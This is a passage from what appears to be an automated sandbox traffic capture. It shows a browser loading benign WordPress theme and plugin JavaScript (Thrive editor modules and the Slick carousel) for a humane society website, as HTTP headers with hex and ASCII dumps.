                                                                                                                                                                                                                                                        Data Ascii: .length&&i.toggleClass("tve_display"),d();break;case 38:0===a.length?r(s.find(".tve-lg-dropdown-option,.tve-dynamic-dropdown-option").last(),s):a.prev().length&&r(a.prev(),s);break;case 40:0===a.length?r(s.find(".tve-lg-dropdown-option,.tve-dynamic-dropdo
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC102INData Raw: 22 63 68 61 6e 67 65 76 61 6c 75 65 2e 74 76 65 44 72 6f 70 64 6f 77 6e 22 2c 74 68 69 73 29 7d 29 29 7d 2c 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 64 72 6f 70 64 6f 77 6e 22 2c 21 30 29 7d 29 28 54 68 72 69 76 65 47 6c 6f 62 61 6c 2e 24 6a 29 3b
                                                                                                                                                                                                                                                        Data Ascii: "changevalue.tveDropdown",this)}))},TCB_Front.setModuleLoadedStatus("dropdown",!0)})(ThriveGlobal.$j);


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        54192.168.2.449812192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC633OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-grid-compat.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC677INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 1412
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-grid-compat.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC692INData Raw: 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 5b 22 70 6f 73 74 2d 67 72 69 64 2d 63 6f 6d 70 61 74 22 5d 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 70 6f 73 74 2d 67 72 69 64 2d 63 6f 6d 70 61 74 22 2c 21 31 29 2c 28 74 3d 3e 7b 69 66 28 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 70 6f 73 74 2d 67 72 69 64 2d 63 6f 6d 70 61 74 22 29 29 72 65 74 75 72 6e 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 2e 70 6f 73 74 47 72 69 64 4c 61 79 6f 75 74 28 29 7d 29 29 3b 63 6f 6e 73 74 20 6f 3d 7b 70 6f 73 74 47 72 69 64 4c 61 79 6f 75 74 28
                                                                                                                                                                                                                                                        Data Ascii: void 0===TCB_Front.js_modules["post-grid-compat"]&&TCB_Front.setModuleLoadedStatus("post-grid-compat",!1),(t=>{if(TCB_Front.isModuleLoaded("post-grid-compat"))return;window.addEventListener("load",(function(){o.postGridLayout()}));const o={postGridLayout(
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC720INData Raw: 5f 70 6f 73 74 22 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 73 3d 74 28 74 68 69 73 29 2c 65 3d 73 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 3b 65 3e 6f 26 26 28 6f 3d 65 29 2c 73 2e 63 73 73 28 22 68 65 69 67 68 74 22 2c 22 31 30 30 25 22 29 7d 29 29 2c 73 2e 63 73 73 28 22 68 65 69 67 68 74 22 2c 6f 2d 31 2b 22 70 78 22 29 7d 29 29 7d 7d 3b 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 74 63 62 5f 61 66 74 65 72 5f 64 6f 6d 5f 72 65 61 64 79 22 2c 28 28 29 3d 3e 7b 6f 2e 70 6f 73 74 47 72 69 64 4c 61 79 6f 75 74 28 29 2c 54 43 42 5f 46 72 6f 6e 74 2e 55 74 69 6c 73 2e 69 73 45 64 69 74 6f 72 50 61 67 65 28 29 7c 7c 54 43 42 5f 46 72 6f 6e 74 2e 61 64 64 52 65 73 69 7a 65 43 61 6c 6c 62 61 63 6b 28 6f 2e 70 6f 73 74 47 72 69
                                                                                                                                                                                                                                                        Data Ascii: _post").each((function(){const s=t(this),e=s.outerHeight();e>o&&(o=e),s.css("height","100%")})),s.css("height",o-1+"px")}))}};t(window).on("tcb_after_dom_ready",(()=>{o.postGridLayout(),TCB_Front.Utils.isEditorPage()||TCB_Front.addResizeCallback(o.postGri


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        55192.168.2.449813192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC439OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/carousel-libs.min.js?ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC666INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 43468
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/carousel-libs.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC703INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 69 3d 7b 38 37 30 39 37 3a 28 69 2c 65 2c 74 29 3d 3e 7b 76 61 72 20 6f 2c 73 2c 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 3d 5b 74 28 34 31 36 36 39 29 5d 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 2c 74 3d 77 69 6e 64 6f 77 2e 53 6c 69 63 6b 7c 7c 7b 7d 3b 28 65 3d 30 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 76 61 72 20 73 2c 6e 3d 74 68 69 73 3b 6e 2e 64 65 66 61 75 6c 74 73 3d 7b 61 63 63 65 73 73 69 62 69 6c 69 74 79 3a 21 30 2c 61 64 61 70 74 69 76 65 48 65 69 67 68 74 3a 21 31 2c 61 70 70 65 6e 64 41 72 72 6f 77 73 3a 69 28 74 29 2c 61 70 70 65 6e 64 44 6f 74 73 3a 69 28 74 29 2c 61 72 72 6f 77 73 3a 21 30 2c 61 73 4e 61 76 46 6f 72 3a 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var i={87097:(i,e,t)=>{var o,s,n;!function(){"use strict";s=[t(41669)],o=function(i){var e,t=window.Slick||{};(e=0,t=function(t,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(t),appendDots:i(t),arrows:!0,asNavFor:null,
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 3a 21 31 2c 69 6e 66 69 6e 69 74 65 3a 21 30 2c 69 6e 69 74 69 61 6c 53 6c 69 64 65 3a 30 2c 6c 61 7a 79 4c 6f 61 64 3a 22 6f 6e 64 65 6d 61 6e 64 22 2c 6d 6f 62 69 6c 65 46 69 72 73 74 3a 21 31 2c 70 61 75 73 65 4f 6e 48 6f 76 65 72 3a 21 30 2c 70 61 75 73 65 4f 6e 46 6f 63 75 73 3a 21 30 2c 70 61 75 73 65 4f 6e 44 6f 74 73 48 6f 76 65 72 3a 21 31 2c 72 65 73 70 6f 6e 64 54 6f 3a 22 77 69 6e 64 6f 77 22 2c 72 65 73 70 6f 6e 73 69 76 65 3a 6e 75 6c 6c 2c 72 6f 77 73 3a 30 2c 72 74 6c 3a 21 31 2c 73 6c 69 64 65 3a 22 22 2c 73 6c 69 64 65 73 50 65 72 52 6f 77 3a 31 2c 73 6c 69 64 65 73 54 6f 53 68 6f 77 3a 31 2c 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 3a 31 2c 73 70 65 65 64 3a 35 30 30 2c 73 77 69 70 65 3a 21 30 2c 73 77 69 70 65 54 6f 53 6c 69 64 65 3a
                                                                                                                                                                                                                                                        Data Ascii: :!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:0,rtl:!1,slide:"",slidesPerRow:1,slidesToShow:1,slidesToScroll:1,speed:500,swipe:!0,swipeToSlide:
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6e 3d 22 6d 6f 7a 48 69 64 64 65 6e 22 2c 6e 2e 76 69 73 69 62 69 6c 69 74 79 43 68 61 6e 67 65 3d 22 6d 6f 7a 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 29 3a 76 6f 69 64 20 30 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 77 65 62 6b 69 74 48 69 64 64 65 6e 26 26 28 6e 2e 68 69 64 64 65 6e 3d 22 77 65 62 6b 69 74 48 69 64 64 65 6e 22 2c 6e 2e 76 69 73 69 62 69 6c 69 74 79 43 68 61 6e 67 65 3d 22 77 65 62 6b 69 74 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 29 2c 6e 2e 61 75 74 6f 50 6c 61 79 3d 69 2e 70 72 6f 78 79 28 6e 2e 61 75 74 6f 50 6c 61 79 2c 6e 29 2c 6e 2e 61 75 74 6f 50 6c 61 79 43 6c 65 61 72 3d 69 2e 70 72 6f 78 79 28 6e 2e 61 75 74 6f 50 6c 61 79 43 6c 65 61 72 2c 6e 29 2c 6e 2e 61 75 74 6f 50 6c 61 79 49 74 65 72 61 74 6f 72 3d 69 2e
                                                                                                                                                                                                                                                        Data Ascii: n="mozHidden",n.visibilityChange="mozvisibilitychange"):void 0!==document.webkitHidden&&(n.hidden="webkitHidden",n.visibilityChange="webkitvisibilitychange"),n.autoPlay=i.proxy(n.autoPlay,n),n.autoPlayClear=i.proxy(n.autoPlayClear,n),n.autoPlayIterator=i.
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 64 65 78 22 2c 65 29 7d 29 29 2c 73 2e 24 73 6c 69 64 65 73 43 61 63 68 65 3d 73 2e 24 73 6c 69 64 65 73 2c 73 2e 72 65 69 6e 69 74 28 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 6e 69 6d 61 74 65 48 65 69 67 68 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 69 66 28 31 3d 3d 3d 69 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 26 26 21 30 3d 3d 3d 69 2e 6f 70 74 69 6f 6e 73 2e 61 64 61 70 74 69 76 65 48 65 69 67 68 74 26 26 21 31 3d 3d 3d 69 2e 6f 70 74 69 6f 6e 73 2e 76 65 72 74 69 63 61 6c 29 7b 69 2e 24 73 6c 69 64 65 73 2e 65 71 28 69 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 61 63 74 69 76 65 22 29 3b 76 61 72 20 65 3d 69 2e 24 73 6c 69 64 65 73
                                                                                                                                                                                                                                                        Data Ascii: dex",e)})),s.$slidesCache=s.$slides,s.reinit()},t.prototype.animateHeight=function(){var i=this;if(1===i.options.slidesToShow&&!0===i.options.adaptiveHeight&&!1===i.options.vertical){i.$slides.eq(i.currentSlide).removeClass("slick-active");var e=i.$slides
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 61 73 4e 61 76 46 6f 72 3b 72 65 74 75 72 6e 20 65 26 26 6e 75 6c 6c 21 3d 3d 65 26 26 28 65 3d 69 28 65 29 2e 6e 6f 74 28 74 68 69 73 2e 24 73 6c 69 64 65 72 29 29 2c 65 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 73 4e 61 76 46 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 67 65 74 4e 61 76 54 61 72 67 65 74 28 29 3b 6e 75 6c 6c 21 3d 3d 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 69 28 74 68 69 73 29 2e 73 6c 69 63 6b 28 22 67 65 74 53 6c 69 63 6b 22 29 3b 74 2e 75 6e 73 6c 69 63 6b 65 64 7c 7c 74 2e 73 6c 69 64 65 48 61 6e 64 6c 65 72
                                                                                                                                                                                                                                                        Data Ascii: unction(){var e=this.options.asNavFor;return e&&null!==e&&(e=i(e).not(this.$slider)),e},t.prototype.asNavFor=function(e){var t=this.getNavTarget();null!==t&&"object"==typeof t&&t.each((function(){var t=i(this).slick("getSlick");t.unslicked||t.slideHandler
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 3f 28 65 2e 24 70 72 65 76 41 72 72 6f 77 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 68 69 64 64 65 6e 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 20 74 61 62 69 6e 64 65 78 22 29 2c 65 2e 24 6e 65 78 74 41 72 72 6f 77 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 68 69 64 64 65 6e 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 20 74 61 62 69 6e 64 65 78 22 29 2c 65 2e 68 74 6d 6c 45 78 70 72 2e 74 65 73 74 28 65 2e 6f 70 74 69 6f 6e 73 2e 70 72 65 76 41 72 72 6f 77 29 26 26 65 2e 24 70 72 65 76 41 72 72 6f 77 2e 70 72 65 70 65 6e 64 54 6f 28 65 2e 6f 70 74 69 6f 6e 73 2e 61 70 70 65 6e 64 41 72 72 6f
                                                                                                                                                                                                                                                        Data Ascii: options.slidesToShow?(e.$prevArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.$nextArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.htmlExpr.test(e.options.prevArrow)&&e.$prevArrow.prependTo(e.options.appendArro
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 72 65 6e 74 28 29 2c 65 2e 24 6c 69 73 74 3d 65 2e 24 73 6c 69 64 65 54 72 61 63 6b 2e 77 72 61 70 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6c 69 63 6b 2d 6c 69 73 74 22 2f 3e 27 29 2e 70 61 72 65 6e 74 28 29 2c 65 2e 24 73 6c 69 64 65 54 72 61 63 6b 2e 63 73 73 28 22 6f 70 61 63 69 74 79 22 2c 30 29 2c 21 30 21 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 63 65 6e 74 65 72 4d 6f 64 65 26 26 21 30 21 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 73 77 69 70 65 54 6f 53 6c 69 64 65 7c 7c 28 65 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 3d 31 29 2c 69 28 22 69 6d 67 5b 64 61 74 61 2d 6c 61 7a 79 5d 22 2c 65 2e 24 73 6c 69 64 65 72 29 2e 6e 6f 74 28 22 5b 73 72 63 5d 22 29 2e 61 64 64 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 6c 6f 61 64 69 6e 67 22
                                                                                                                                                                                                                                                        Data Ascii: rent(),e.$list=e.$slideTrack.wrap('<div class="slick-list"/>').parent(),e.$slideTrack.css("opacity",0),!0!==e.options.centerMode&&!0!==e.options.swipeToSlide||(e.options.slidesToScroll=1),i("img[data-lazy]",e.$slider).not("[src]").addClass("slick-loading"
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 72 65 61 6b 70 6f 69 6e 74 73 29 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 26 26 28 21 31 3d 3d 3d 72 2e 6f 72 69 67 69 6e 61 6c 53 65 74 74 69 6e 67 73 2e 6d 6f 62 69 6c 65 46 69 72 73 74 3f 6e 3c 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 5d 26 26 28 73 3d 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 5d 29 3a 6e 3e 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 5d 26 26 28 73 3d 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 5d 29 29 3b 6e 75 6c 6c 21 3d 3d 73 3f 6e 75 6c 6c 21 3d 3d 72 2e 61 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 3f 28 73 21 3d 3d 72 2e 61 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 7c 7c 74 29 26 26 28 72 2e 61 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 3d 73 2c 22 75 6e 73 6c
                                                                                                                                                                                                                                                        Data Ascii: reakpoints)r.breakpoints.hasOwnProperty(o)&&(!1===r.originalSettings.mobileFirst?n<r.breakpoints[o]&&(s=r.breakpoints[o]):n>r.breakpoints[o]&&(s=r.breakpoints[o]));null!==s?null!==r.activeBreakpoint?(s!==r.activeBreakpoint||t)&&(r.activeBreakpoint=s,"unsl
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 3b 62 72 65 61 6b 3b 63 61 73 65 22 69 6e 64 65 78 22 3a 76 61 72 20 6c 3d 30 3d 3d 3d 65 2e 64 61 74 61 2e 69 6e 64 65 78 3f 30 3a 65 2e 64 61 74 61 2e 69 6e 64 65 78 7c 7c 72 2e 69 6e 64 65 78 28 29 2a 6e 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 3b 6e 2e 73 6c 69 64 65 48 61 6e 64 6c 65 72 28 6e 2e 63 68 65 63 6b 4e 61 76 69 67 61 62 6c 65 28 6c 29 2c 21 31 2c 74 29 2c 72 2e 63 68 69 6c 64 72 65 6e 28 29 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 7d 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 4e 61 76 69 67 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 2c 74 3b 69 66 28 74 3d 30 2c 69 3e 28 65 3d 74 68 69 73 2e 67 65 74 4e
                                                                                                                                                                                                                                                        Data Ascii: ;break;case"index":var l=0===e.data.index?0:e.data.index||r.index()*n.options.slidesToScroll;n.slideHandler(n.checkNavigable(l),!1,t),r.children().trigger("focus");break;default:return}},t.prototype.checkNavigable=function(i){var e,t;if(t=0,i>(e=this.getN
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 69 73 69 62 69 6c 69 74 79 29 2c 65 2e 63 6c 65 61 6e 55 70 53 6c 69 64 65 45 76 65 6e 74 73 28 29 2c 21 30 3d 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 61 63 63 65 73 73 69 62 69 6c 69 74 79 26 26 65 2e 24 6c 69 73 74 2e 6f 66 66 28 22 6b 65 79 64 6f 77 6e 2e 73 6c 69 63 6b 22 2c 65 2e 6b 65 79 48 61 6e 64 6c 65 72 29 2c 21 30 3d 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 66 6f 63 75 73 4f 6e 53 65 6c 65 63 74 26 26 69 28 65 2e 24 73 6c 69 64 65 54 72 61 63 6b 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 73 6c 69 63 6b 22 2c 65 2e 73 65 6c 65 63 74 48 61 6e 64 6c 65 72 29 2c 69 28 77 69 6e 64 6f 77 29 2e 6f 66 66 28 22 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 2e 73 6c 69 63 6b 2e 73 6c 69 63 6b 2d 22 2b 65 2e 69 6e 73 74 61 6e 63
                                                                                                                                                                                                                                                        Data Ascii: isibility),e.cleanUpSlideEvents(),!0===e.options.accessibility&&e.$list.off("keydown.slick",e.keyHandler),!0===e.options.focusOnSelect&&i(e.$slideTrack).children().off("click.slick",e.selectHandler),i(window).off("orientationchange.slick.slick-"+e.instanc


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        56192.168.2.449811192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC609OUTGET /wp-content/themes/thrive-theme/thrive-dashboard/js/dist/frontend.min.js?ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC662INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 2085
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/themes/thrive-theme/thrive-dashboard/js/dist/frontend.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 17:13:47 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC707INData Raw: 28 28 29 3d 3e 7b 69 66 28 77 69 6e 64 6f 77 2e 54 56 45 5f 44 61 73 68 3d 77 69 6e 64 6f 77 2e 54 56 45 5f 44 61 73 68 7c 7c 7b 7d 2c 21 65 7c 7c 21 65 2e 24 6a 29 7b 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 24 2c 65 3d 7b 24 6a 3a 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 28 29 7d 3b 61 26 26 28 77 69 6e 64 6f 77 2e 24 3d 61 29 7d 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 54 56 45 5f 44 61 73 68 2e 61 6a 61 78 5f 73 65 6e 74 3d 21 31 3b 76 61 72 20 74 3d 7b 7d 2c 73 3d 7b 7d 3b 54 56 45 5f 44 61 73 68 2e 61 64 64 5f 6c 6f 61 64 5f 69 74 65 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 6f 29 7b 76 61 72 20 72 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 6f 26 26 28 6f 3d 61 2e 6e 6f 6f 70 29 2c 54 56 45 5f 44 61 73 68 2e 61 6a
                                                                                                                                                                                                                                                        Data Ascii: (()=>{if(window.TVE_Dash=window.TVE_Dash||{},!e||!e.$j){var a=window.$,e={$j:jQuery.noConflict()};a&&(window.$=a)}!function(a){TVE_Dash.ajax_sent=!1;var t={},s={};TVE_Dash.add_load_item=function(e,n,o){var r;if("function"!=typeof o&&(o=a.noop),TVE_Dash.aj
